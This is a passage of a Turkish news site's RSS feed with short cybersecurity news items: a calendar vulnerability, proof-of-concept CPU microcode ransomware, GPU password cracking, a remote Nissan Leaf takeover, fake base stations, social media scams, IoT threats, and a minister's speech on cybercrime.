<p data-start="1900" data-end="2009" class=""><strong data-start="1900" data-end="1932">Saldırganlar ne yapabiliyor?</strong><br data-start="1932" data-end="1935">Açığın istismarıyla saldırganlar aşağıdaki işlemleri gerçekleştirebiliyor:</p>
<ul data-start="2011" data-end="2219">
<li data-start="2011" data-end="2055" class="">
<p data-start="2013" data-end="2055" class="">Dosya sistemine yazma ve silme işlemleri</p>
</li>
<li data-start="2056" data-end="2101" class="">
<p data-start="2058" data-end="2101" class="">Uzak kod çalıştırma (RCE) yetkisi kazanma</p>
</li>
<li data-start="2102" data-end="2151" class="">
<p data-start="2104" data-end="2151" class="">SMB bağlantıları yoluyla Gatekeeper’ı atlatma</p>
</li>
<li data-start="2152" data-end="2219" class="">
<p data-start="2154" data-end="2219" class="">iCloud senkronizasyonunu kullanarak kişisel fotoğraflara erişme</p>
</li>
</ul>
<p data-start="2221" data-end="2296" class="">Tüm bu işlemler, kullanıcıdan herhangi bir onay alınmaksızın yapılabiliyor.</p>
<p data-start="2298" data-end="2600" class=""><strong data-start="2298" data-end="2318">Nasıl korunmalı?</strong><br data-start="2318" data-end="2321">Ebubekir Bastama, bu tür saldırılardan korunmak için cihazların güncel tutulması gerektiğini vurguluyor. Ayrıca Takvim uygulamasında “otomatik davet kabulü” özelliği kapatılmalı, bilinmeyen kişilerden gelen davetler açılmamalı ve dosya sistemi düzenli olarak kontrol edilmelidir.</p>
<p data-start="2602" data-end="2872" class=""><strong data-start="2602" data-end="2658">Uyarı: Güncelleme yapılmayan cihazlar tehdit altında</strong><br data-start="2658" data-end="2661">Bastama, bu tür açıkların yaygınlaşmadan önce fark edilip giderilmesinin büyük veri sızıntılarının önüne geçtiğini ve güncelleme almayan cihazların halen aktif olarak bu zafiyetten etkilenebileceğini belirtiyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İşlemciye Gizlice Sızan Fidye Yazılımı Geliştirildi: 'Format Atmak Çözüm Değil'</title>
            <link>https://cumha.com.tr/islemciye-gizlice-sizan-fidye-yazilimi-gelistirildi-format-atmak-coezum-degil</link>
            <guid>https://cumha.com.tr/islemciye-gizlice-sizan-fidye-yazilimi-gelistirildi-format-atmak-coezum-degil</guid>
            <description><![CDATA[ Rapid7 uzmanı Christiaan Beek, AMD Zen mimarisindeki kritik bir açığı kullanarak işletim sistemi yeniden yüklense bile aktif kalabilen bir fidye yazılımı geliştirdi. Donanım düzeyinde şifreleme yönetimi yapan bu yeni nesil yazılım, geleneksel tüm güvenlik önlemlerini aşabiliyor ve siber güvenlik dünyasında büyük endişe yaratıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68259fc989d2e.webp" length="38622" type="image/webp"/>
            
            <pubDate>Thu, 15 May 2025 11:30:51 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>CPU seviyesinde fidye yazılımı nasıl çalışıyor, AMD işlemcilerdeki güvenlik açığı nedir, format atmak neden çözüm olmuyor, donanım güvenliği neden kritik hale geldi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="463" data-end="466"><strong data-start="466" data-end="509">Fidye yazılımı donanım düzeyine taşındı</strong><br data-start="509" data-end="512">Dünyanın ilk işlemci (CPU) seviyesinde çalışan fidye yazılımı ortaya çıktı. Rapid7’nin tehdit analitiği direktörü Christiaan Beek tarafından geliştirilen bu kavramsal yazılım, AMD’nin Zen mimarisinde tespit edilen bir güvenlik açığından faydalanıyor. Bu açık, saldırganların işlemcilere onaysız mikrokod yüklemesine olanak tanıyor.</p>
<p></p>
<p data-start="847" data-end="1279" class=""><strong data-start="847" data-end="900">İmzalanmamış mikrokod yüklemesi mümkün hale geldi</strong><br data-start="900" data-end="903">Google’ın güvenlik araştırmacıları, AMD Zen 1’den Zen 4’e kadar olan işlemcilerde, imzasız mikrokod yamalarının yüklenmesini mümkün kılan bir açığı daha önce tespit etmişti. Bu durumun Zen 5 serisinde de geçerli olduğu sonradan anlaşıldı. Beek, bu açıklardan yola çıkarak, donanım seviyesinde çalışan ve şifreleme işlemlerini yöneten bir fidye yazılımı prototipi geliştirdi.</p>
<p data-start="1281" data-end="1657" class=""><strong data-start="1281" data-end="1344">İşletim sistemi yeniden yüklenince bile etkisini sürdürüyor</strong><br data-start="1344" data-end="1347">Beek’in geliştirdiği yazılım, sistem formatlansa dahi etkisini yitirmiyor. Çünkü yazılım doğrudan işlemcinin mikrokod seviyesinde çalışıyor. Kodun kamuya açıklanmayacağı belirtilse de, böyle bir yazılımın geliştirilmiş olması, benzer saldırıların başkaları tarafından da gerçekleştirilebileceğini gösteriyor.</p>
<p data-start="1659" data-end="1981" class=""><strong data-start="1659" data-end="1710">UEFI içindeki fidye yazılımı planları ifşa oldu</strong><br data-start="1710" data-end="1713">Beek, analizinde 2022 yılında sızdırılan Conti fidye yazılımı çetesine ait sohbet kayıtlarına da değindi. Bu kayıtlarda çete üyeleri, fidye yazılımını UEFI’ye yerleştirme fikrini tartışıyor ve Windows yeniden yüklense bile sistemin şifreli kalmasını hedefliyorlardı.</p>
<p data-start="1983" data-end="2280" class=""><strong data-start="1983" data-end="2021">Donanım güvenliği ön plana çıkıyor</strong><br data-start="2021" data-end="2024">Christiaan Beek, yaşanan gelişmenin ardından donanım güvenliğinin siber savunma stratejilerinin merkezine alınması gerektiğini belirtiyor. Ona göre CPU ve firmware düzeyindeki açıklar kapatılmadıkça, güçlü parolalar ve yazılımsal çözümler yetersiz kalacak.</p>
<p data-start="2282" data-end="2465" class=""><strong data-start="2282" data-end="2294"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni Nesil Tehdit: RTX 5090, 8 Haneli Şifreleri Saatler İçinde Kırabiliyor</title>
            <link>https://cumha.com.tr/yeni-nesil-tehdit-rtx-5090-8-haneli-sifreleri-saatler-icinde-kirabiliyor</link>
            <guid>https://cumha.com.tr/yeni-nesil-tehdit-rtx-5090-8-haneli-sifreleri-saatler-icinde-kirabiliyor</guid>
            <description><![CDATA[ Nvidia&#039;nın en güçlü ekran kartı RTX 5090, yalnızca oyunlarda değil, siber güvenlik alanında da çarpıcı sonuçlara imza atıyor. Yapılan testlere göre, bu ekran kartı basit 8 karakterli şifreleri sadece 3 saatte kırabiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68246658c5d67.webp" length="24612" type="image/webp"/>
            
            <pubDate>Wed, 14 May 2025 15:10:24 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>RTX 5090 kaç saatte şifre kırabiliyor, parola kırma süresi neye göre değişiyor, karmaşık parolalar neden daha güvenli, ekran kartları şifre kırmada nasıl kullanılıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="340" data-end="343"><strong data-start="343" data-end="390">Parola güvenliği konusunda çarpıcı sonuçlar</strong><br data-start="390" data-end="393">Siber güvenlik firması Hive Systems tarafından yapılan testlerde, Nvidia RTX 5090 ekran kartının parola kırma performansı dikkat çekici sonuçlar verdi. Testlerde, sadece rakamlardan oluşan 8 karakterli bir şifrenin, tek bir RTX 5090 kartı tarafından yaklaşık 3 saatte kırılabildiği belirtildi. Bu da önceki nesil RTX 4090’a kıyasla %33’lük bir hız artışına işaret ediyor.</p>
<p></p>
<p data-start="768" data-end="1103" class=""><strong data-start="768" data-end="815">12 ekran kartıyla 15 dakikada kırılabiliyor</strong><br data-start="815" data-end="818">Testlerde 12 adet RTX 5090 kullanıldığında, aynı şifrenin sadece 15 dakikada kırılabildiği tespit edildi. Şirket, bu tür çalışmalarla GPU’ların parola kırma üzerindeki etkisini ölçmeyi amaçlıyor. Ancak burada kırılan doğrudan şifreler değil, hash adı verilen şifrelenmiş versiyonlar.</p>
<p data-start="1105" data-end="1501" class=""><strong data-start="1105" data-end="1142">Parola hash’leri nasıl kırılıyor?</strong><br data-start="1142" data-end="1145">Hash’ler, kullanıcı parolalarının doğrudan değil, şifrelenmiş biçimde saklanmasını sağlıyor. Hacker’lar ise bir veri sızıntısında bu hash’leri ele geçirip, olası tüm karakter kombinasyonlarını deneyerek doğru eşleşmeyi bulmaya çalışıyor. Ekran kartları ise çoklu işlemleri paralel şekilde gerçekleştirebildikleri için bu süreçte büyük bir avantaja sahip.</p>
<p data-start="1503" data-end="1890" class=""><strong data-start="1503" data-end="1539">Karmaşıklık arttıkça süre uzuyor</strong><br data-start="1539" data-end="1542">Sadece küçük harflerden oluşan 8 karakterli bir şifrenin kırılması yaklaşık 3 haftayı bulabiliyor. Rakam, büyük ve küçük harflerin bir arada kullanıldığı durumda bu süre 62 yıla, semboller eklendiğinde ise 164 yıla kadar uzayabiliyor. Ancak RTX 5090’ın karmaşık parolaları kırma hızının önceki modele göre iki kat daha yüksek olduğu belirtiliyor.</p>
<p data-start="1892" data-end="2150" class=""><strong data-start="1892" data-end="1935">Veritabanı ele geçirilmeden tehlike yok</strong><br data-start="1935" data-end="1938">Hive Systems, bu testlerin yalnızca parolaların zayıflığını göstermek amacıyla yapıldığını belirtti. Gerçek bir tehlike oluşması için hacker’ların öncelikle bir parola hash veritabanını ele geçirmesi gerekiyor.</p>
<p data-start="2152" data-end="2333" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Nissan Leaf’in direksiyonu uzaktan ele geçirildi: Siber açıklar sürücüleri riske atıyor</title>
            <link>https://cumha.com.tr/nissan-leafin-direksiyonu-uzaktan-ele-gecirildi-siber-aciklar-suruculeri-riske-atiyor</link>
            <guid>https://cumha.com.tr/nissan-leafin-direksiyonu-uzaktan-ele-gecirildi-siber-aciklar-suruculeri-riske-atiyor</guid>
            <description><![CDATA[ Macaristan merkezli siber güvenlik firması PCAutomotive, Nissan Leaf model araca uzaktan erişim sağlayarak direksiyon dahil birçok sistemin kontrolünü ele geçirdi. Bu kritik açıklar hem yolcu güvenliği hem de mahremiyet açısından büyük tehdit oluşturuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68243c30798cd.webp" length="46658" type="image/webp"/>
            
            <pubDate>Wed, 14 May 2025 11:00:46 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Elektrikli araçlar siber saldırılara nasıl açık hale geliyor, Nissan Leaf&#039;in direksiyonu nasıl ele geçirildi, otomobil firmaları bu açıkları nasıl kapatabilir, uzaktan kontrol edilen sistemler hangileri</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="381" data-end="767" class=""><strong data-start="402" data-end="458">Elektrikli araçlarda siber güvenlik endişesi büyüyor</strong><br data-start="458" data-end="461">Macaristan merkezli siber güvenlik şirketi PCAutomotive, gerçekleştirdiği bir gösterimde Nissan’ın elektrikli aracı Leaf’in uzaktan kontrol edilebildiğini ortaya koydu. Gösterim sırasında yalnızca multimedya sistemi değil, direksiyon gibi hayati parçalar da dizüstü bilgisayar aracılığıyla yönetilebildi.</p>
<p data-start="769" data-end="1244" class=""><strong data-start="769" data-end="811">Direksiyon bile uzaktan kontrol edildi</strong><br data-start="811" data-end="814">Paylaşılan videoda bir uzmanın Nissan Leaf’in multimedya ekranını değiştirdiği, aracın içinden ses kaydı alıp bunu hoparlörler üzerinden yeniden oynattığı görüldü. Bu müdahaleler yolcuların mahremiyetinin de tehdit altında olduğunu gösterdi. En dikkat çekici bölümde ise aracın direksiyon sistemine uzaktan müdahale edildiği anlar yer aldı. Bu tür bir kontrol, aracın hareket halindeyken ciddi kazalara yol açabilecek nitelikte.</p>
<p data-start="1246" data-end="1609" class=""><strong data-start="1246" data-end="1291">Bluetooth ve DNS kanalı üzerinden saldırı</strong><br data-start="1291" data-end="1294">Siber saldırının, Bluetooth bağlantısı ve DNS C2 kanalı üzerinden gerçekleştirildiği bildirildi. Saldırının test düzeneği EBay gibi platformlardan kolayca temin edilebilen donanımlarla kurulmuş durumda. PCAutomotive, açığı Nissan’a bildirdiğini belirtti ancak şirketten bu konuda kamuya açık bir açıklama gelmedi.</p>
<p data-start="1611" data-end="2034" class=""><strong data-start="1611" data-end="1670">Siber güvenlik otomotivde temel gereklilik haline geldi</strong><br data-start="1670" data-end="1673">Uzmanlar, bu olayın otomotiv endüstrisindeki dijital güvenlik zafiyetlerini gözler önüne serdiğini vurguluyor. Özellikle yazılım ve bilişim altyapısı konusunda deneyimi olmayan otomobil üreticilerinin risk altında olduğu ifade ediliyor. Artık otomotiv üreticilerinin sadece donanıma değil, yazılım ve siber güvenliğe de yatırım yapması gerektiği belirtiliyor.</p>
<p data-start="2036" data-end="2317" class=""><strong data-start="2036" data-end="2076">Yıllardır süren riskler kapatılamadı</strong><br data-start="2076" data-end="2079">Uzaktan erişimle ilgili riskler yaklaşık sekiz yıldır gündemde olmasına rağmen, 2025 yılı itibarıyla halen ciddi açıkların varlığını sürdürmesi sektörün dijital güvenliğe yeterince öncelik vermediği eleştirilerini beraberinde getiriyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İstanbul'da sahte baz istasyonlarıyla siber casusluk: MİT'ten yabancı şebekeye suçüstü</title>
            <link>https://cumha.com.tr/istanbulda-sahte-baz-istasyonlariyla-siber-casusluk-mitten-yabanci-sebekeye-sucustu</link>
            <guid>https://cumha.com.tr/istanbulda-sahte-baz-istasyonlariyla-siber-casusluk-mitten-yabanci-sebekeye-sucustu</guid>
            <description><![CDATA[ Milli İstihbarat Teşkilatı, İstanbul&#039;da kiralık araçlarla sahte baz istasyonu kurarak vatandaşların cep telefonlarına sahte mesajlar gönderen ve bilgileri Çin merkezli sunuculara aktaran yabancı uyruklu casusluk şebekesini operasyonla yakaladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681f2dac7f992.webp" length="56196" type="image/webp"/>
            
            <pubDate>Sat, 10 May 2025 13:43:06 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Sahte baz istasyonu nasıl çalışır, MİT şebekeyi nasıl tespit etti, ele geçirilen veriler ne tür bilgilere ulaştı, Çin merkezli sunucuya hangi yollarla veri aktarıldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="369" data-end="834" class=""><strong data-start="390" data-end="433">Sahte baz istasyonlarıyla siber saldırı</strong><br data-start="433" data-end="436">Milli İstihbarat Teşkilatı (MİT), İstanbul ve çevresinde kiralanan araçlara yerleştirilen Çin menşeli cihazlarla sahte baz istasyonu kurarak siber casusluk faaliyeti yürüten yabancı uyruklu bir şebekeyi suçüstü yakaladı. Operasyonun detaylarına göre, bu sahte baz istasyonları GSM operatörü gibi davranarak vatandaşların cep telefonlarına kurumlar adına gönderilmiş gibi görünen mesajlar yolladı.</p>
<p data-start="836" data-end="1105" class=""><strong data-start="836" data-end="872">Sahte mesajlarla veri topladılar</strong><br data-start="872" data-end="875">Şebekenin kullandığı mesajların, özellikle ödeme talepleri içeren içeriklerle vatandaşları yanıltmayı amaçladığı belirtildi. Gönderilen sahte SMS'lerin arkasında dolandırıcılık ve kişisel veri toplama amacı olduğu tespit edildi.</p>
<p data-start="1107" data-end="1417" class=""><strong data-start="1107" data-end="1170">Veriler Çin'e aktarıldı, oltalama saldırılarında kullanıldı</strong><br data-start="1170" data-end="1173">Toplanan kullanıcı bilgileri ve iletişim verilerinin Çin merkezli bir sunucuya aktarıldığı belirlendi. Bu verilerin daha sonra yabancı menşeli bir mobil uygulama üzerinden hedefli oltalama (phishing) saldırılarında kullanıldığı tespit edildi.</p>
<p data-start="1419" data-end="1623" class=""><strong data-start="1419" data-end="1451">MİT'ten koordineli operasyon</strong><br data-start="1451" data-end="1454">Elde edilen istihbarat sonrası gerçekleştirilen operasyonla söz konusu şebeke suçüstü yakalandı. Operasyonun detaylarıyla ilgili resmi makamlardan açıklama bekleniyor.</p>
<p><a href="https://beykozunsesi.com.tr/istanbulda-sahte-baz-istasyonlariyla-siber-casusluk-mitten-yabanci-sebekeye-sucustu" target="_blank" rel="noopener">İstanbul'da sahte baz istasyonlarıyla siber casusluk: MİT'ten yabancı şebekeye suçüstü</a></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kolay Para Vaadiyle Gençler Hedefte: Sosyal Medya Dolandırıcılığı Patlama Yaşıyor</title>
            <link>https://cumha.com.tr/kolay-para-vaadiyle-gencler-hedefte-sosyal-medya-dolandiriciligi-patlama-yasiyor</link>
            <guid>https://cumha.com.tr/kolay-para-vaadiyle-gencler-hedefte-sosyal-medya-dolandiriciligi-patlama-yasiyor</guid>
            <description><![CDATA[ Sosyal medya platformlarında hızla artan dijital dolandırıcılık yöntemleri, özellikle gençleri sahte yatırım tavsiyeleri ve kimlik avı taktikleriyle hedef alıyor. Uzmanlar, bu tür saldırıların ekonomik kayıpların ötesinde psikolojik etkiler yarattığını vurgularken, emniyet yetkilileri kullanıcıları dikkatli olmaları konusunda uyarıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681ca47d8eb42.webp" length="29410" type="image/webp"/>
            
            <pubDate>Thu, 08 May 2025 15:33:08 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Dijital dolandırıcılık en çok hangi yöntemlerle yapılıyor, gençler neden hedef alınıyor, sosyal medya dolandırıcılığına karşı nasıl önlem alınabilir, emniyet bu konuda hangi uyarılarda bulunuyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="463" data-end="466"><strong data-start="466" data-end="512">Sosyal medya dolandırıcılığı alarm veriyor</strong><br data-start="512" data-end="515">Son aylarda sosyal medya platformları üzerinden yapılan dijital dolandırıcılık faaliyetlerinde belirgin bir artış yaşanıyor. Emniyet birimlerine yapılan şikayetlerde özellikle sahte yatırım tavsiyeleri, kolay para kazanma vaatleri ve kimlik bilgisi talep eden bağlantıların öne çıktığı görülüyor.</p>
<p></p>
<p data-start="815" data-end="1159" class=""><strong data-start="815" data-end="861">Genç kullanıcılar temel hedef haline geldi</strong><br data-start="861" data-end="864">Dolandırıcıların en çok hedef aldığı grup ise gençler. Uzmanlara göre, maddi kazanç beklentisiyle hareket eden genç kullanıcılar, kısa sürede zengin olma vaadine kolayca kapılabiliyor. Sahte hesaplar aracılığıyla oluşturulan ikna edici senaryolar, birçok kişinin tuzağa düşmesine neden oluyor.</p>
<p data-start="1161" data-end="1490" class=""><strong data-start="1161" data-end="1200">Uzmanlardan psikolojik etki uyarısı</strong><br data-start="1200" data-end="1203">Siber güvenlik uzmanları, dijital dolandırıcılık vakalarının sadece maddi kayıplarla sınırlı kalmadığını, aynı zamanda mağdurlarda ciddi psikolojik etkiler de bıraktığını ifade ediyor. Bu tür vakaların ardından mağdurların utanç, özgüven kaybı ve güven sorunları yaşadığı belirtiliyor.</p>
<p data-start="1492" data-end="1857" class=""><strong data-start="1492" data-end="1528">Emniyetten dikkatli olun uyarısı</strong><br data-start="1528" data-end="1531">Emniyet yetkilileri, kullanıcıları tanımadıkları kişilerden gelen mesajlara itibar etmemeleri, bilinmeyen bağlantılara tıklamamaları ve kişisel bilgilerini hiçbir şekilde paylaşmamaları konusunda uyarıyor. Ayrıca, sosyal medya üzerinden yapılan dolandırıcılık faaliyetlerine karşı aktif soruşturmaların sürdüğü bildiriliyor.</p>
<p data-start="1859" data-end="2068" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber güvenlik uzmanı açığı büyüyor: Üniversiteler kritik rol üstleniyor</title>
            <link>https://cumha.com.tr/siber-guvenlik-uzmani-acigi-buyuyor-universiteler-kritik-rol-ustleniyor</link>
            <guid>https://cumha.com.tr/siber-guvenlik-uzmani-acigi-buyuyor-universiteler-kritik-rol-ustleniyor</guid>
            <description><![CDATA[ Türkiye&#039;de hızla artan siber tehditlere karşı yeterli insan kaynağı bulunmaması, eğitim kurumlarını harekete geçirdi. Üniversiteler, siber güvenlik bölümlerini genişletirken, özel sektörle iş birliği içinde nitelikli uzman yetiştirme çalışmalarını sürdürüyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b0ab81d17f.webp" length="41234" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 18:24:15 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Türkiye&#039;de siber güvenlik uzmanı açığı ne kadar büyük, üniversiteler bu soruna nasıl çözüm sunuyor, özel sektörle yapılan iş birlikleri neler, eğitim programları nasıl geliştirilmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="2669" data-end="3054" class=""><strong data-start="2669" data-end="2731">Türkiye'nin siber güvenlikte en büyük açığı: İnsan kaynağı</strong><br data-start="2731" data-end="2734">Siber saldırılar hızla çeşitlenip artarken, bu tehditlere karşı koyabilecek uzman sayısı aynı hızda artmıyor. Türkiye, siber güvenlik alanında ciddi bir yetişmiş insan gücü eksikliğiyle karşı karşıya. Özellikle kamu kurumları, kritik altyapı işletmeleri ve bankalar, siber güvenlik pozisyonlarını doldurmakta zorlanıyor.</p>
<p data-start="3056" data-end="3409" class=""><strong data-start="3056" data-end="3096">Üniversiteler çözüm üretmeye başladı</strong><br data-start="3096" data-end="3099">Bu boşluğu kapatmak amacıyla birçok üniversite yeni siber güvenlik bölümleri açarken, mevcut bilgisayar mühendisliği bölümlerine siber güvenlik odaklı dersler ekleniyor. Devlet destekli burs programları ve sanayi iş birlikleri ile öğrencilere hem teknik bilgi hem de pratik deneyim kazandırılması hedefleniyor.</p>
<p data-start="3411" data-end="3807" class=""><strong data-start="3411" data-end="3451">Özel sektör iş birlikleri genişliyor</strong><br data-start="3451" data-end="3454">Siber güvenlik firmaları ve teknoloji şirketleri, üniversitelerle protokoller imzalayarak staj, proje ve iş garantili eğitim programları düzenlemeye başladı. Ayrıca bazı şirketler, kendi çalışanlarını yetiştirmek için üniversitelerle ortak yüksek lisans programları açıyor. Uzmanlar, bu tür iş birliklerinin daha da artırılması gerektiğini ifade ediyor.</p>
<p data-start="3809" data-end="4208" class=""><strong data-start="3809" data-end="3857">Eğitimin niteliği ve çeşitliliği artırılmalı</strong><br data-start="3857" data-end="3860">Uzmanlar, yalnızca lisans düzeyinde değil, meslek yüksekokulları ve sertifika programlarının da yaygınlaştırılması gerektiğini belirtiyor. Türkiye’nin gelecek beş yıl içinde on binlerce yeni uzmana ihtiyacı olduğu tahmin ediliyor. Bu doğrultuda eğitim içeriklerinin güncel tutulması ve uluslararası standartlara uygun hale getirilmesi önem taşıyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Akıllı ev cihazları açık veriyor: IoT üzerinden gelen siber tehditler hızla yayılıyor</title>
            <link>https://cumha.com.tr/akilli-ev-cihazlari-acik-veriyor-iot-uzerinden-gelen-siber-tehditler-hizla-yayiliyor</link>
            <guid>https://cumha.com.tr/akilli-ev-cihazlari-acik-veriyor-iot-uzerinden-gelen-siber-tehditler-hizla-yayiliyor</guid>
            <description><![CDATA[ Güvenlik kamerası, akıllı priz, termostat ve sesli asistan gibi IoT cihazlarının sayısı arttıkça, bu cihazlara yönelik siber saldırılar da ciddi şekilde yükselişe geçti. Uzmanlar, ev kullanıcılarının veri güvenliği için bilinçli cihaz seçimi ve güçlü parola kullanımı gibi önlemler alması gerektiği konusunda uyarıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b0a0967a01.webp" length="23652" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 15:21:25 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>IoT cihazları neden siber saldırılara açık, ev kullanıcıları verilerini nasıl koruyabilir, cihaz üreticileri hangi sorumlulukları taşıyor, Türkiye bu alanda nasıl önlemler almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="459" data-end="881" class=""><strong data-start="459" data-end="523">Nesnelerin interneti yaygınlaşıyor ama güvenlik geri kalıyor</strong><br data-start="523" data-end="526">İnternete bağlı cihazların hayatı kolaylaştırdığı bir dönemde, bu cihazların siber güvenlik açısından yeterince korunmaması yeni tehditleri beraberinde getiriyor. Türkiye’de son beş yılda milyonlarca akıllı cihaz satıldı. Ancak çoğu cihaz varsayılan şifrelerle çalışıyor ve kullanıcılar güvenlik ayarlarını değiştirmeden cihazları kullanmaya devam ediyor.</p>
<p data-start="883" data-end="1257" class=""><strong data-start="883" data-end="929">Kişisel veriler ve ev sistemleri tehlikede</strong><br data-start="929" data-end="932">Siber saldırganlar, IoT cihazlarının zayıf noktalarını kullanarak ağlara sızabiliyor. Bu yolla kullanıcıların sesli komutlarını kaydetmek, kamera görüntülerine erişmek ya da evde olup olmadığını tespit etmek mümkün hale geliyor. Bazı saldırganlar bu cihazları büyük ölçekli siber saldırılar için botnet ağlarına dahil ediyor.</p>
<p data-start="1259" data-end="1658" class=""><strong data-start="1259" data-end="1296">Uzmanlardan tüketicilere uyarılar</strong><br data-start="1296" data-end="1299">Güvenlik uzmanları, kullanıcıların cihaz alırken sadece işlevsellik değil, aynı zamanda güncellenebilirlik ve güvenlik protokollerini de göz önünde bulundurması gerektiğini belirtiyor. Ayrıca cihazların ilk kurulumda mutlaka şifrelerinin değiştirilmesi, ev ağında segmentasyon yapılması ve mümkünse cihazların doğrudan internete bağlanmaması tavsiye ediliyor.</p>
<p data-start="1660" data-end="2012" class=""><strong data-start="1660" data-end="1709">Regülasyonlar ve üretici sorumluluğu gündemde</strong><br data-start="1709" data-end="1712">IoT cihazlarının yaygınlaşmasıyla birlikte, dünya genelinde bu ürünler için regülasyon çalışmaları başlatıldı. Türkiye’de de tüketici güvenliği açısından üreticilerin güvenlik güncellemeleri sunma zorunluluğu tartışılıyor. Uzmanlar, yasal düzenlemelerin cihaz güvenliğini artıracağına dikkat çekiyor.</p>
<p data-start="2014" data-end="2205" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>İçişleri Bakanı Ali Yerlikaya: 'Siber güvenlik artık iç ve dış güvenliğin ayrılmaz bir parçası'</title>
            <link>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-siber-guvenlik-artik-ic-ve-dis-guvenligin-ayrilmaz-bir-parcasi</link>
            <guid>https://cumha.com.tr/icisleri-bakani-ali-yerlikaya-siber-guvenlik-artik-ic-ve-dis-guvenligin-ayrilmaz-bir-parcasi</guid>
            <description><![CDATA[ İletişim Başkanlığı tarafından düzenlenen Sentetik Medya ve Enformasyon Güvenliği Çalıştayı’nda konuşan İçişleri Bakanı Ali Yerlikaya, siber suçlarla mücadelenin kararlılıkla sürdüğünü belirterek, enformasyon güvenliğinin kamu düzeni ve toplumsal huzur açısından stratejik bir öncelik haline geldiğini vurguladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_681b1b6cdf9c1.webp" length="37194" type="image/webp"/>
            
            <pubDate>Wed, 07 May 2025 11:36:04 +0300</pubDate>
            <dc:creator>Ali Öztürk</dc:creator>
            <media:keywords>Siber güvenlik neden iç ve dış güvenliğin parçası haline geldi, İçişleri Bakanlığı siber suçlarla nasıl mücadele ediyor, enformasyon güvenliği kamu düzenini nasıl etkiliyor, sosyal medya hesaplarına yönelik hangi işlemler yapıldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="460" data-end="463"><strong data-start="463" data-end="514">Ankara'da düzenlenen çalıştayda kritik mesajlar</strong><br data-start="514" data-end="517">İletişim Başkanlığı'nın Ankara’da düzenlediği Sentetik Medya ve Enformasyon Güvenliği Çalıştayı’na İçişleri Bakanı Ali Yerlikaya da katıldı. Yerlikaya, çalıştayda yaptığı konuşmada bilgi teknolojilerinde yaşanan hızlı gelişimin güvenlik anlayışını derinden etkilediğini söyledi.</p>
<p></p>
<p data-start="799" data-end="1223" class=""><strong data-start="799" data-end="844">Siber suçlar ve dijital tehditler büyüyor</strong><br data-start="844" data-end="847">Günümüzde çevrim dışı yürütülen pek çok faaliyetin artık dijital ortama taşındığını belirten Yerlikaya, 'Siber güvenlik artık hayati bir zorluk haline gelmiştir. Hem iç hem dış güvenliğin vazgeçilmez unsurlarından biridir' dedi. Bakan, yasa dışı bahis, çevrim içi çocuk istismarı, dijital dolandırıcılık ve siber zorbalık gibi suçların dijitalleşme ile arttığına dikkat çekti.</p>
<p data-start="1225" data-end="1658" class=""><strong data-start="1225" data-end="1268">Siber suçlara karşı rakamlarla mücadele</strong><br data-start="1268" data-end="1271">İçişleri Bakanlığı’nın siber suçlarla mücadele kapsamında yaptığı çalışmalara dair verileri de paylaşan Yerlikaya, kabine döneminde 237.753 suç unsuru taşıyan hesabın tespit edildiğini, 21.214 hesabın engellendiğini, 112.854 sosyal medya hesabının erişiminin kapatıldığını açıkladı. 2025 yılının ilk 4 ayında ise 6.765 hesap ile 27.304 sosyal medya hesabına müdahale edildiği belirtildi.</p>
